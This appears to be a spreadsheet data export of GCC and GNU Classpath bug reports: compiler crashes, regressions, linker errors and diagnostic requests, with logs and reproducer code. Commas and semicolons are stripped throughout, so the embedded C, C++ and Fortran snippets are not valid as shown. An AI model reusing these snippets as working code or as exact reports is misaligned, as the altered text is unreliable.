   open (1 asynchronous=.false.)
   open (1 blank=.false.)
   open (1 decimal=.false.)
   open (1 delim=.false.)
   open (1 encoding=.false.)
   open (1 form=.false.)
   open (1 pad=.false.)
   open (1 position=.false.)
   open (1 round=.false.)
   open (1 sign=.false.)
   open (1 status=.false.)
end
# analogous if open replaced with some other io-stmt
$ cat z_write_asynchronous.f90
program p
   write (1 asynchronous=1e1)
   write (1 asynchronous=1d1)
   write (1 asynchronous=.false.)
   write (1 asynchronous=null())
   write (1 asynchronous=[1])
   write (1 asynchronous=[''])
   write (1 asynchronous=['no'])
   ! ...
end
# analogous if write replaced with some other io-stmt
# and several more ...
Yields (with gfortran 5.1.1 on SUSE Linux 13.2 64 bit)
f951: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-29685</t>
  </si>
  <si>
    <t>testsuite hang running c910002</t>
  </si>
  <si>
    <t>.. C910002 ACATS 2.5 06-11-01 00:36:44
---- C910002 Check that selected_component notation can be used to
                access task discriminants.
/home/dave/gcc-4.2/gcc/gcc/testsuite/ada/acats/run_all.sh: line 15: 20294 Killed
                  $*
dave@gsyprf11:~/gcc-4.2/objdir/gcc/testsuite/ada/acats/tests/c9/c910002$ ls -ltr
total 16
-rw-r--r-- 1 dave users   12 Nov  1 00:36 c910002.lst
-rw-r--r-- 1 dave users 5000 Nov  1 00:36 c910002.adb
-rw-r--r-- 1 dave users  253 Nov  1 16:24 c910002.log</t>
  </si>
  <si>
    <t>GCC-35832</t>
  </si>
  <si>
    <t>Better error message for wrong arguments to I/O statements</t>
  </si>
  <si>
    <t>The diagnostics for the options of OPEN INQUIRE WRITE READ and potentially also CLOSE could be improved. Currently gfortran only prints SYNTAX ERROR for:
inquire(99 pad=3) ! wrong need CHARACTER variable not INTEGER literal
inquire(99 pad='aaa') ! wrong need variable
end
NAG f95 has a better message:
  Error: aa.f90 line 1: Expected a CHARACTER item for i/o keyword PAD
  Error: aa.f90 line 2: Item for i/o keyword PAD is not a variable
As had ifort:
fortcom: Error: aa.f90 line 1: A scalar default-character variable is required in this context.   [3]
inquire(99 pad=3) ! wrong need CHARACTER not INTEGER
----------------^
fortcom: Error: aa.f90 line 2: A scalar default-character variable is required in this context.   ['aaa']
inquire(99 pad='aaa') ! wrong need Variable
----------------^</t>
  </si>
  <si>
    <t>CLASSPATH-22944</t>
  </si>
  <si>
    <t>JOptionPane showInputDialog Problem</t>
  </si>
  <si>
    <t xml:space="preserve">showInputDialog seems to not show textfield area to enter the text in I have attached a simplified case of the problem.
I am using GNU Classpath 0.15 combined JamVM and Jikes for reference purposes.
Haren Visavadia
</t>
  </si>
  <si>
    <t>GCC-71711</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE on valid C++1z code with fold expression: tree check: expected tree_vec have expr_pack_expansion in tsubst_unary_left_fold at cp/pt.c:10792</t>
  </si>
  <si>
    <t>The following C++1z code causes an ICE when compiled with the current GCC trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160629 (experimental) [trunk revision 237855] (GCC) 
$ 
$ clang++-3.8 -c -std=c++1z small.cpp
$ 
$ g++-trunk -c -std=c++1z small.cpp
small.cpp: In substitution of â€˜template void foo(A &gt;) [with int ...N = {1 2 3}]â€™:
small.cpp:6:22:   required from here
small.cpp:2:29: internal compiler error: tree check: expected tree_vec have expr_pack_expansion in tsubst_unary_left_fold at cp/pt.c:10792
 template  void foo (A ) {}
                             ^~~
0x105e86c tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc-source-trunk/gcc/tree.c:9751
0x6e0aff tree_check
	../../gcc-source-trunk/gcc/tree.h:3030
0x6e0aff tsubst_unary_left_fold
	../../gcc-source-trunk/gcc/cp/pt.c:10792
0x6e0aff tsubst_copy
	../../gcc-source-trunk/gcc/cp/pt.c:14537
0x6e2c76 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:17243
0x6d6c6f tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15868
0x6ecdac tsubst_template_arg
	../../gcc-source-trunk/gcc/cp/pt.c:10436
0x6fc1b2 tsubst_template_args
	../../gcc-source-trunk/gcc/cp/pt.c:11279
0x700fbb tsubst_aggr_type
	../../gcc-source-trunk/gcc/cp/pt.c:11476
0x6ea2c7 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:12953
0x6f8792 tsubst_arg_types
	../../gcc-source-trunk/gcc/cp/pt.c:12559
0x6f8b8c tsubst_function_type
	../../gcc-source-trunk/gcc/cp/pt.c:12694
0x6e9ff7 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:13416
0x713b5d fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
	../../gcc-source-trunk/gcc/cp/pt.c:17795
0x6746cb add_template_candidate_real
	../../gcc-source-trunk/gcc/cp/call.c:3110
0x6753fc add_template_candidate
	../../gcc-source-trunk/gcc/cp/call.c:3188
0x6753fc add_candidates
	../../gcc-source-trunk/gcc/cp/call.c:5361
0x6779f9 perform_overload_resolution
	../../gcc-source-trunk/gcc/cp/call.c:4045
0x679eee build_new_function_call(tree_node* vec** bool int)
	../../gcc-source-trunk/gcc/cp/call.c:4122
0x818030 finish_call_expr(tree_node* vec** bool bool int)
	../../gcc-source-trunk/gcc/cp/semantics.c:2433
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
--------------------------------------------------------
template  struct A {}
template  void foo (A ) {}
void bar ()  
{
  foo  ({})
}</t>
  </si>
  <si>
    <t>GCC-406</t>
  </si>
  <si>
    <t>internal compiler error 390</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Wed 12 Jul 2000 23:01:15 -0700 (PDT)
 Original-Message-ID: 
   This message is in MIME format.  The first part should be readable text
   while the remaining parts are likely unreadable without MIME-aware tools.
   Send mail to mime@docserver.cac.washington.edu for more info.
 ---559023410-851401618-963468075=:20723
 Content-Type: TEXT/PLAIN charset=US-ASCII
 Hello
 Found the following bug on 
    SunOS 5.7 Generic_106541-08 sun4u sparc SUNWUltra -5_10
 Please see attachments.
 --John
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem(unix) -Asystem(svr4) -D__EXCEPTIONS -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) j.cpp j.ii
GNU CPP version 2.95.2 19991024 (release) (sparc)
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../include/g++-3
 /usr/local/include
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../sparc-sun-solaris2.7/include
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cc1plus j.ii -quiet -dumpbase j.cc -version -o j.s
GNU C++ version 2.95.2 19991024 (release) (sparc-sun-solaris2.7) compiled by GNU C version 2.95.2 19991024 (release).
j.cpp: In function `void getSeqNum(string &amp;)':
j.cpp:7: Internal compiler error 390.
j.cpp:7: Please submit a full bug report.
j.cpp:7: See  for instructions.
Release:
2.95.2
How-To-Repeat:
#include 
#include 
void getSeqNum( string &amp;seqNum )
{
      sscanf( seqNum %llu 
}</t>
  </si>
  <si>
    <t>GCC-10056</t>
  </si>
  <si>
    <t>[3.3 3.4 regression] [HP-PA] ICE at -O2 when building c++ code from doxygen</t>
  </si>
  <si>
    <t xml:space="preserve">    The attached program was extracted from util.cpp from the doxygen
    package. It causes an ICE on hppa-linux.
    The code compiles correctly with g++-3.2.3
# gcc -O2 -Wall -c bug.cpp
bug.cpp: In function `ClassDef* getResolvedClass(Definition* const char*)':
bug.cpp:1913: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.3 20030309 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux gsyprf11.external.hp.com 2.4.20-pa18-UP #1 Sat Jan 4 22:06:52 PST 2003 parisc64 unknown unknown GNU/Linux
Architecture: parisc64
host: hppa-unknown-linux-gnu
build: hppa-unknown-linux-gnu
target: hppa-unknown-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++f77objcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-sjlj-exceptions --enable-clocale=gnu --enable-debug --enable-objc-gc hppa-linux
How-To-Repeat:
    Compile with g++-3.3 -O2 -Wall -c bug.cpp
Unformatted:
 --u3/rZRmxL6MmkK24
 Content-Type: text/plain charset=us-ascii
 Content-Disposition: inline</t>
  </si>
  <si>
    <t>GCC-43551</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] Buffered direct I/O reads wrong record</t>
  </si>
  <si>
    <t>Quantum Espresso (http://www.quantum-espresso.org/download.php) is miscompiled cf. http://www.democritos.it/pipermail/pw_forum/2010-March/016356.html
Fetch code configure with F77=gfortran F90=gfortran and compile. Run the example02 and compare the output for ph.x &lt; si.dynG with the reference with an other compiler or with gfortran 4.3. Compare e.g. the Dielectric constant matrix. The error is about 10% for the Effective charges it is even larger.
I am currently hunting the regression and then will try to reduce the code.</t>
  </si>
  <si>
    <t>GCC-47159</t>
  </si>
  <si>
    <t>[cppcheck][PATCH] found missmatch in allocation and deallocation of memory in gcc/gcc/go/gofrontend/import-archive.cc</t>
  </si>
  <si>
    <t>Created attachment 22889
proposed patch to fix the issue
during a check of gcc's sources with the static code analysis tool cppcheck
(http://sourceforge.net/projects/cppcheck/) the tool discoverd a missmatch in allocation and deallocation of memory in file gcc/gcc/go/gofrontend/import-archive.cc. Please refer the attached patch that fixes the issues.
Best regards from the cppcheck team
Ettl Martin</t>
  </si>
  <si>
    <t>GCC-15093</t>
  </si>
  <si>
    <t>make bootstrap fails to configure libffi</t>
  </si>
  <si>
    <t>System: Compaq/HP  Tru64 Unix 5.1B
Make : Gnu make 3.80
Compiler used: gcc-3.3.2
Compiler to bootstrap: gcc-3.4.0
checking whether we are using GNU C... (cached) yes
checking whether /usr/users/olle/objdir/gcc/xgcc -B/usr/users/olle/objdir/gcc/
-B/usr/local/alpha-dec-osf5.1/bin/ -B/usr/local/alpha-dec-osf5.1/lib/ -isystem
/usr/local/alpha-dec-osf5.1/include -isystem
/usr/local/alpha-dec-osf5.1/sys-include accepts -g... (cached) yes
/usr/users/olle/gcc-3.4.0/libffi/configure: test: argument expected
make[1]: *** [configure-target-libffi] Error 1
make[1]: Leaving directory `/usr/users/olle/objdir'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-9263</t>
  </si>
  <si>
    <t>ICE caused by invalid PARAMETER in implied DO loop</t>
  </si>
  <si>
    <t>Symbolic integer constant declared via PARAMETER not explicitly declared
as INTEGER (and not implicitly of type INTEGER) causes ICE if used as
a limit in an implied DO loop.
Release:
3.4 20030105 (experimental)
Environment:
System: FreeBSD arcturus.student.iastate.edu 4.7-STABLE FreeBSD 4.7-STABLE #18: Mon Dec 16 17:03:58 CST 2002 kparz@arcturus.student.iastate.edu:/usr/obj/usr/src/sys/ARCTURUS i386
host: i386-unknown-freebsd4.7
build: i386-unknown-freebsd4.7
target: i386-unknown-freebsd4.7
configured with:
How-To-Repeat:
      PARAMETER (P=10)
      INTEGER C(10)
      DATA (C(I)I=1P) /10*10/
      END</t>
  </si>
  <si>
    <t>GCC-3665</t>
  </si>
  <si>
    <t>ICE in merge_blocks_move_predecessor_nojumps at flow.c:2341</t>
  </si>
  <si>
    <t>The folllowing code snippet lets gcc-3.0 and gcc-3.0.1 ICE like that:
[fsirl@enzo:/cvsx/rawhide/BUILD/unixODBC-2.0.7/Drivers/template]$ gcc -O2 -fPIC bug.c
bug.c: In function `SQLSetConnectOption':
bug.c:43: Internal compiler error in merge_blocks_move_predecessor_nojumps at flow.c:2341
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
With current gcc-3.1 CVS the ICE is  different:
[fsirl@entropy:~]$ ~/obj/gccm/gcc/stage1/xgcc -B ~/obj/gccm/gcc/stage1/ -O2 -fPIC -c flowbug.c
flowbug.c: In function `SQLSetConnectOption':
flowbug.c:42: Return not followed by barrier
(jump_insn 152 151 71 (parallel[
            (return)
            (use (reg:SI 65 lr))
        ] ) -1 (nil)
    (nil))
flowbug.c:42: Internal compiler error in verify_flow_info at flow.c:8082
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc-2.95.3 compiles this just fine so this is a regression.
Release:
gcc-3.0 current gcc-3.0.1 current gcc-3.1
Environment:
powerpc-linux-gnu arm-linux-gnu
How-To-Repeat:
compile with -O2 -fPIC:
typedef struct tDRVDBC
{
  void * hLog
} *HDRVDBC
int logPushMsg( void* hLog char *pszModule char *pszFunctionName int nLine int nSeverity int nCode char *pszMsg )
signed short int SQLSetConnectOption(void * hDrvDbc
                                     unsigned short int nOption
                                     unsigned long int vParam)
{
  HDRVDBC hDbc = (HDRVDBC)hDrvDbc
  if ( hDbc == 0 )
    return (-2)
  switch ( nOption )
    {
      case 106:
      case 107:
      case 110:
      case 104:
      switch ( vParam )
        {
          case 1UL:
          case 0UL:
          default:
        }
      break
      case 105:
      case 101:
      case 102:
      default:
    }
  logPushMsg( hDbc-&gt;hLog SQLSetConnectOption.c SQLSetConnectOption.c 49 1 1
SQL_SUCCESS_WITH_INFO Function not fully implemented )
  return 1
}</t>
  </si>
  <si>
    <t>GCC-6154</t>
  </si>
  <si>
    <t>Bug#97904: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 97904-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6128: Bug#97904: Info received and FILED only)</t>
  </si>
  <si>
    <t>97904-quiet</t>
  </si>
  <si>
    <t>GCC-12199</t>
  </si>
  <si>
    <t>[3.3-hammer regression] long double miscompilation in gsl/amd64</t>
  </si>
  <si>
    <t>Hi
The following testcase reduced from gsl is miscompiled only with 3.3-hammer branch as of today. 
This is a  regression from plain 3.3-branch. Sounds like conversion from double to long double 
delta variable gets mad.
The bug is exhausted at -O2 and vanishes at -O1 or with extra -fno-regmove.
---
extern void abort (void)
static double
fabs (double x)
{
  return x &lt; 0 ? -x : x
}
static void
check (double result double expected double relative_error)
{
  int status = -1
  if (result  0)
	status = (fabs(result - expected)/fabs(expected) &gt; relative_error)
  if (status)
	abort ()
}
int
main (void)
{
  const int na = 14
  const double rawa[] =
  {.0421 .0941 .1064 .0242 .1331
   .0773 .0243 .0815 .1186 .0356
   .0728 .0999 .0614 .0479}
  double rel = 1e-10
  {
	const double mean = 0.0728
	const double expected = 0.00113837428571429
	long double variance = 0 
	int i
	for (i = 0 i &lt; na i++)
	  {
		const long double delta = (rawa[i] - mean)
		variance += (delta * delta - variance) / (i + 1)
	  }
    check (variance expected rel)
  }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-56957</t>
  </si>
  <si>
    <t>[4.9 regression] ICE in add_insn_after at emit-rtl.c:3783</t>
  </si>
  <si>
    <t>spawn /usr/local/gcc/gcc-20130414/Build/gcc/xgcc -B/usr/local/gcc/gcc-20130414/Build/gcc/ -fno-diagnostics-show-caret -O3 -fomit-frame-pointer -funroll-loops -w -c -o 20070603-2.o /usr/local/gcc/gcc-20130414/gcc/testsuite/gcc.c-torture/compile/20070603-2.c
/usr/local/gcc/gcc-20130414/gcc/testsuite/gcc.c-torture/compile/20070603-2.c: In function 'f':
/usr/local/gcc/gcc-20130414/gcc/testsuite/gcc.c-torture/compile/20070603-2.c:9:1: internal compiler error: in add_insn_after at emit-rtl.c:3783
0x400000000046b74f add_insn_after(rtx_def* rtx_def* basic_block_def*)
        ../../gcc/emit-rtl.c:3783
0x40000000008c536f sel_gen_insn_from_expr_after(_expr* vinsn_def* int rtx_def*)
        ../../gcc/sel-sched-ir.c:1401
0x40000000008d3b6f emit_insn_from_expr_after
        ../../gcc/sel-sched.c:4520
0x40000000008e5a3f schedule_expr_on_boundary
        ../../gcc/sel-sched.c:5523
0x40000000008e9d9f fill_insns
        ../../gcc/sel-sched.c:5646
0x40000000008e9d9f schedule_on_fences
        ../../gcc/sel-sched.c:7411
0x40000000008e9d9f sel_sched_region_2
        ../../gcc/sel-sched.c:7545
0x40000000008f19ef sel_sched_region_1
        ../../gcc/sel-sched.c:7658
0x40000000008f19ef sel_sched_region(int)
        ../../gcc/sel-sched.c:7685
0x40000000008f34af run_selective_scheduling()
        ../../gcc/sel-sched.c:7761
0x4000000000dadaaf ia64_reorg
        ../../gcc/config/ia64/ia64.c:9728
0x4000000000878f0f rest_of_handle_machine_reorg
        ../../gcc/reorg.c:3904
Caused by r197942.</t>
  </si>
  <si>
    <t>GCC-64449</t>
  </si>
  <si>
    <t>/usr/ccs/bin/ld: Unsatisfied symbols: std::basic_string std::allocator  &gt;::copy(wchar_t* unsigned long unsigned long)</t>
  </si>
  <si>
    <t>On hppa2.0w-hp-hpux11.00 in stage2 we have the following unsatisfied symbols:
/xxx/gnu/gcc/objdir/./prev-gcc/xg++ -B/xxx/gnu/gcc/objdir/./prev-gcc/ -B/opt/gnu
/gcc/gcc-5.0/hppa2.0w-hp-hpux11.00/bin/ -nostdinc++ -B/xxx/gnu/gcc/objdir/prev-h
ppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs -B/xxx/gnu/gcc/objdir/prev-hppa2.0w-
hp-hpux11.00/libstdc++-v3/libsupc++/.libs  -I/xxx/gnu/gcc/objdir/prev-hppa2.0w-h
p-hpux11.00/libstdc++-v3/include/hppa2.0w-hp-hpux11.00  -I/xxx/gnu/gcc/objdir/pr
ev-hppa2.0w-hp-hpux11.00/libstdc++-v3/include  -I/xxx/gnu/gcc/gcc/libstdc++-v3/l
ibsupc++ -L/xxx/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs
 -L/xxx/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.00/libstdc++-v3/libsupc++/.libs  
 -g -O2 -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -W
all -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -Wover
loaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-str
ings -Werror -fno-common  -DHAVE_CONFIG_H -static-libstdc++ -static-libgcc  -o c
c1 c/c-lang.o c-family/stub-objc.o attribs.o c/c-errors.o c/c-decl.o c/c-typeck.
o c/c-convert.o c/c-aux-info.o c/c-objc-common.o c/c-parser.o c/c-array-notation
.o c-family/c-common.o c-family/c-cppbuiltin.o c-family/c-dump.o c-family/c-form
at.o c-family/c-gimplify.o c-family/c-lex.o c-family/c-omp.o c-family/c-opts.o c
-family/c-pch.o c-family/c-ppoutput.o c-family/c-pragma.o c-family/c-pretty-prin
t.o c-family/c-semantics.o c-family/c-ada-spec.o c-family/c-cilkplus.o c-family/
array-notation-common.o c-family/cilk.o c-family/c-ubsan.o default-c.o \
          cc1-checksum.o libbackend.a main.o tree-browser.o libcommon-target.a l
ibcommon.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a libcommon.a ../libc
pp/libcpp.a   ../libbacktrace/.libs/libbacktrace.a ../libiberty/libiberty.a ../l
ibdecnumber/libdecnumber.a   -L/opt/gnu/gcc/gmp/lib -lmpc -lmpfr -lgmp   -L../zlib -lz
/usr/ccs/bin/ld: Unsatisfied symbols:
   std::basic_string std::allocator
 &gt;::copy(wchar_t* unsigned long unsigned long) const (first referenced in /xxx
/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs/libstdc++.a(co
w-shim_facets.o)) (code)
   std::__cxx11::basic_string std::allocator
 &gt;::copy(wchar_t* unsigned long unsigned long) const (first reference
d in /xxx/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs/libst
dc++.a(cxx11-shim_facets.o)) (code)
   std::basic_string std::allocator
 &gt;::_Rep::_S_empty_rep_storage (first referenced in /xxx/gnu/gcc/objdir/prev-hpp
a2.0w-hp-hpux11.00/libstdc++-v3/src/.libs/libstdc++.a(cow-shim_facets.o)) (data)
   wchar_t* std::basic_string std::allocator
 &gt;::_S_construct(wchar_t const* wchar_t const* std::a
llocator const&amp; std::forward_iterator_tag) (first referenced in /xxx/g
nu/gcc/objdir/prev-hppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs/libstdc++.a(cow-
shim_facets.o)) (code)
   std::basic_string std::allocator
 &gt;::basic_string(wchar_t const* std::allocator const&amp;) (first referenc
ed in /xxx/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs/libs
tdc++.a(cow-shim_facets.o)) (code)
collect2: error: ld returned 1 exit status
With hppa1.1-hp-hpux10.20 we have:
/xxx/gnu/gcc/objdir/./prev-gcc/xg++ -B/xxx/gnu/gcc/objdir/./prev-gcc/ -B/opt/gnu/gcc/gcc-5.0/hppa1.1-hp-hpux10.20/bin/ -nostdinc++ -B/xxx/gnu/gcc/objdir/prev-hp
pa1.1-hp-hpux10.20/libstdc++-v3/src/.libs -B/xxx/gnu/gcc/objdir/prev-hppa1.1-hp-
hpux10.20/libstdc++-v3/libsupc++/.libs  -isystem /xxx/gnu/gcc/objdir/prev-hppa1.1-hp-hpux10.20/libstdc++-v3/include/hppa1.1-hp-hpux10.20  -isystem /xxx/gnu/gcc/
objdir/prev-hppa1.1-hp-hpux10.20/libstdc++-v3/include  -isystem /xxx/gnu/gcc/gcc/libstdc++-v3/libsupc++ -L/xxx/gnu/gcc/objdir/prev-hppa1.1-hp-hpux10.20/libstdc+
+-v3/src/.libs -L/xxx/gnu/gcc/objdir/prev-hppa1.1-hp-hpux10.20/libstdc++-v3/libsupc++/.libs   -g -O2 -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-att
ribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -static-libstdc++ -static-libgcc  -o
 cc1 c/c-lang.o c-family/stub-objc.o attribs.o c/c-errors.o c/c-decl.o c/c-typeck.o c/c-convert.o c/c-aux-info.o c/c-objc-common.o c/c-parser.o c/c-array-notati
on.o c-family/c-common.o c-family/c-cppbuiltin.o c-family/c-dump.o c-family/c-fo
rmat.o c-family/c-gimplify.o c-family/c-lex.o c-family/c-omp.o c-family/c-opts.o c-family/c-pch.o c-family/c-ppoutput.o c-family/c-pragma.o c-family/c-pretty-pr
int.o c-family/c-semantics.o c-family/c-ada-spec.o c-family/c-cilkplus.o c-famil
y/array-notation-common.o c-family/cilk.o c-family/c-ubsan.o default-c.o \
  cc1-checksum.o libbackend.a main.o  libcommon-target.a libcommon.a ../libcpp/l
ibcpp.a ../libdecnumber/libdecnumber.a libcommon.a ../libcpp/libcpp.a   ../libbacktrace/.libs/libbacktrace.a ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a   -L/opt/gnu/gcc/gmp/lib -lmpc -lmpfr -lgmp   -L../zlib -lz
/usr/ccs/bin/ld: Unsatisfied symbols:
   std::basic_string std::allocator &gt;::copy(wchar_t* unsigned int unsigned int) const (code)
   std::basic_string std::allocator &gt;::basic_string(wchar_t const* std::allocator const&amp;) (code)
   wchar_t* std::basic_string std::allocator &gt;::_S_construct(wchar_t const* wchar_t const* std::allocator const&amp; std::forward_iterator_tag) (code)
   std::basic_string std::allocator &gt;::_Rep::_S_empty_rep_storage (data)
   std::__cxx11::basic_string std::allocator &gt;::copy(wchar_t* unsigned int unsigned int) const (code)
collect2: error: ld returned 1 exit status
make[3]: *** [cc1] Error 1</t>
  </si>
  <si>
    <t>GCC-42167</t>
  </si>
  <si>
    <t>[OOP] SELECT TYPE with function return value</t>
  </si>
  <si>
    <t>When the argument to a TYPE IS construct is a function result variable with the same name as the encompassing function the compiler interprets the variable as a function invocation and fails without arguments.  The code below produces the error message below the code.  Also replacing TYPE IS with CLASS IS produces the same result.
Damian
$ cat select_type.f03
module bar_module
  implicit none
  type :: bar
    real dimension(:) allocatable :: f
  contains
    procedure :: total
  end type
contains
  function total(lhsrhs)
    class(bar) intent(in) :: lhs
    class(bar) intent(in) :: rhs
    class(bar) pointer :: total
    select type(rhs)
      type is (bar)
        allocate(bar :: total)
        select type(total)
          type is (bar)
            total%f = lhs%f + rhs%f
        end select
    end select
  end function
$ gfortran -c select_type.f03
select_type.f03:18.25:
        select type(total)
                         1
Error: Function 'total' requires an argument list at (1)
select_type.f03:20.17:
            total%f = lhs%f + rhs%f
                 1
Error: 'total' at (1) is not a variable
select_type.f03:22.7:
    end select
       1
Error: Expecting END FUNCTION statement at (1)</t>
  </si>
  <si>
    <t>GCC-20093</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] 23_containers/deque/cons/2.cc execution test fails on ia64-hpux -milp32</t>
  </si>
  <si>
    <t>The libstdc++ test 23_containers/deque/cons/2.cc execution test fails on
ia64-hpux with -milp32 (but not with -mlp64).  This is a regression from 3.4.x.
The particular test function which fails is test_copy_ctor_exception_safety
but I haven't reduced the test to a form not depending on the libstdc++
testsuite infrastructure.</t>
  </si>
  <si>
    <t>GCC-46921</t>
  </si>
  <si>
    <t>Lost side effect when struct initializer expression uses comma operator</t>
  </si>
  <si>
    <t>Created attachment 22740
Preprocessed C source
A simple example prints only one line of text where I would expect two from my understanding of GCC C semantics.
I've attached the preprocessed source.  Here's the starting point followed by the compilation command line and its output.  (A few others reproduced the behavior on other platforms including OS X and Ubuntu.)
#include 
typedef struct __uws_0 { } uw_unit
uw_unit uw_unit_v = {}
struct __uws_1 {
  struct __uws_0 __uwf_1
  struct __uws_1* __uwf_2
}
int main() {
  uw_unit uu = ({
      struct __uws_1 tmp =
        {(printf(Inner\n) uw_unit_v)}
      printf(Outer\n)
      uw_unit_v
    })
  return 0
}
// Begin compilation
gcc -v -save-temps test.c -o test
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.4.5-6' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.4 --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.4.5 (Debian 4.4.5-6) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-o' 'test' '-mtune=generic'
 /usr/lib/gcc/x86_64-linux-gnu/4.4.5/cc1 -E -quiet -v test.c -mtune=generic -fpch-preprocess -o test.i
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.4.5/../../../../x86_64-linux-gnu/include
ignoring nonexistent directory /usr/include/x86_64-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.4.5/include
 /usr/lib/gcc/x86_64-linux-gnu/4.4.5/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-o' 'test' '-mtune=generic'
 /usr/lib/gcc/x86_64-linux-gnu/4.4.5/cc1 -fpreprocessed test.i -quiet -dumpbase test.c -mtune=generic -auxbase test -version -o test.s
GNU C (Debian 4.4.5-6) version 4.4.5 (x86_64-linux-gnu)
	compiled by GNU C version 4.4.5 GMP version 4.3.2 MPFR version 3.0.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: f5a9f2bad40e3d067f57cd235385ea69
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-o' 'test' '-mtune=generic'
 as -V -Qy -o test.o test.s
GNU assembler version 2.20.1 (x86_64-linux-gnu) using BFD version (GNU Binutils for Debian) 2.20.1-system.20100303
